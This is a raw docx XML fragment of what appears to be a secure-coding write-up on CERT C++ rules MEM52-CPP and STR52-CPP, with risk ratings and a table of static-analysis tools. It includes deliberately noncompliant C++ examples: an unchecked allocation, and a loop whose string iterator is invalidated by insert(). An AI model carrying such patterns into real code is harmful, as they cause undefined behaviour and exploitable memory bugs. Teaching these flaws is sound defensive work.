                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66759BD0"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48E7767E"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>std::</w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF1493"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>memcpy</w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(copy, array, size * </w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>sizeof</w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(*copy));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72B9AA3E"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008200"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>// ...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57C510FF" w14:textId="77777777" w:rsidR="00974DF7"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>delete</w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>[] copy;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="316D7001" w14:textId="75AD58C5" w:rsidR="00F72634" w:rsidRPr="00974DF7" w:rsidRDefault="00974DF7" w:rsidP="00974DF7">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>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8599569" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Principles(s):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DD01A90" w14:textId="77777777" w:rsidR="00CB5589" w:rsidRDefault="007F6A57" w:rsidP="00CB5589">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">(9) Use Effective Quality Assurance Techniques- </w:t>
            </w:r>
            <w:r w:rsidR="00CB5589">
              <w:t>Incorporating good quality assurance techniques such as source code audits can help developers find issues such as the one presented in the noncompliant code where the</w:t>
            </w:r>
            <w:r w:rsidR="00CB5589">
              <w:t xml:space="preserve"> results of the allocation were not checked</w:t>
            </w:r>
            <w:r w:rsidR="00CB5589">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69E47378" w14:textId="51456718" w:rsidR="007F6A57" w:rsidRDefault="007F6A57" w:rsidP="00CB5589">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00CB5589">
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) </w:t>
            </w:r>
            <w:r w:rsidR="00CB5589">
              <w:t>Validate Input Data</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00CB5589">
              <w:t xml:space="preserve"> Testing a returned pointer to ensure it is not null before referencing the pointer could prevent an issue from occurring.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DA2381C" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72BD1BCD" w14:textId="28DD7ABE" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BE08C9E" w14:textId="45788139" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="507F810F" w14:textId="5FEB635F" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>P18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4686F95C" w14:textId="58D7C752" w:rsidR="00B475A1" w:rsidRDefault="00C07791"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1BA9A23" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Coverity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5590A5CF" w14:textId="1F48F7F4" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2935D2F6" w14:textId="3999D134" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>CHECKED_RETURN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10EAFC44" w14:textId="1B3F74C9" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Finds inconsistencies in how function call return values are handled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="64F0AC3A" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FA053B5" w14:textId="3B56BA56" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Helix QAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64B7FC40" w14:textId="415EC9F5" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2022.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AF2A366" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>C++3225, C++3226, C++3227, C++3228,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0155179E" w14:textId="57DCC8AA" w:rsidR="00C07791" w:rsidRPr="00C07791" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>C++3229, C++4632</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3877BF3F" w14:textId="5B2F5C17" w:rsidR="00C07791" w:rsidRDefault="00C07791" w:rsidP="00C07791"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C07791" w14:paraId="2E5EE7DD" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="000C184C" w14:textId="378BC4BB" w:rsidR="00C07791" w:rsidRDefault="00C07791" w:rsidP="00C07791">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Parasoft C/C++test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B0CCC4F" w14:textId="1F9607AD" w:rsidR="00C07791" w:rsidRDefault="00C07791" w:rsidP="00C07791">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2022.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76F2DC79" w14:textId="77777777" w:rsidR="00C07791" w:rsidRDefault="00C07791" w:rsidP="00C07791">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>CERT_CPP-MEM52-a</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6506F573" w14:textId="164E4D57" w:rsidR="00C07791" w:rsidRDefault="00C07791" w:rsidP="00C07791">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>CERT_CPP-MEM52-b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="570322E7" w14:textId="0EF3AD81" w:rsidR="00C07791" w:rsidRDefault="00C07791" w:rsidP="00C07791">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00C07791">
              <w:t>Check the return value of new</w:t>
            </w:r>
            <w:r w:rsidRPr="00C07791">
              <w:br/>
              <w:t>Do not allocate resources in function argument list because the order of evaluation of a function's parameters is undefined</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C07791" w14:paraId="2EE1B702" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09F1CB00" w14:textId="2F9619B2" w:rsidR="00C07791" w:rsidRDefault="001A18E8" w:rsidP="00C07791">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Polyspace Bug Finder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C057DF1" w14:textId="72C6EACD" w:rsidR="00C07791" w:rsidRDefault="001A18E8" w:rsidP="00C07791">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>R2022b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19BD5035" w14:textId="7C51A304" w:rsidR="00C07791" w:rsidRDefault="001A18E8" w:rsidP="00C07791">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>CERT C++: MEM52-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EBAC9F0" w14:textId="7073366F" w:rsidR="00C07791" w:rsidRDefault="001A18E8" w:rsidP="00C07791">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="001A18E8">
              <w:t>Checks for unprotected dynamic memory allocation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7C58626" w:rsidR="00381847" w:rsidRPr="00312FB6" w:rsidRDefault="00312FB6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>String Correctness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="72961103" w14:textId="1150B96D" w:rsidR="00381847" w:rsidRDefault="00312FB6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>STR</w:t>
            </w:r>
            <w:r w:rsidR="007864CE">
              <w:t>52-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="02179BF3" w14:textId="748AA742" w:rsidR="00381847" w:rsidRDefault="007864CE">
            <w:r w:rsidRPr="007864CE">
              <w:t>Use valid references, pointers, and iterators to reference elements of a basic_string</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36EFD17" w:rsidR="00F72634" w:rsidRDefault="006F6766" w:rsidP="0015146B">
            <w:r>
              <w:t>Input is copied into a std::string and semicolon characters are replaced with spaces. The iterator loc is invalidated after the first call to insert() and subsequent calls are undefined.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="23207A43" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4498C970"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808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;string&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3474B218"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Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BE1057A"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>f(</w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>std::string &amp;input) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="029C1375"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color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>std::string email;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38A325FA"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Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65F4C3AF"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color w:val="008200"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>// Copy input into email converting ";" to " "</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A03F593"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color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>std::string::iterator loc = email.begin();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04F102EA"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>for</w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(auto i = input.begin(), e = input.end(); i != e; ++i, ++loc) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D097DE3"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color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>email.insert(loc, *i != </w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="003366"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>';'</w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>? *i : </w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="003366"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>' '</w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="602F2DC0"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color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
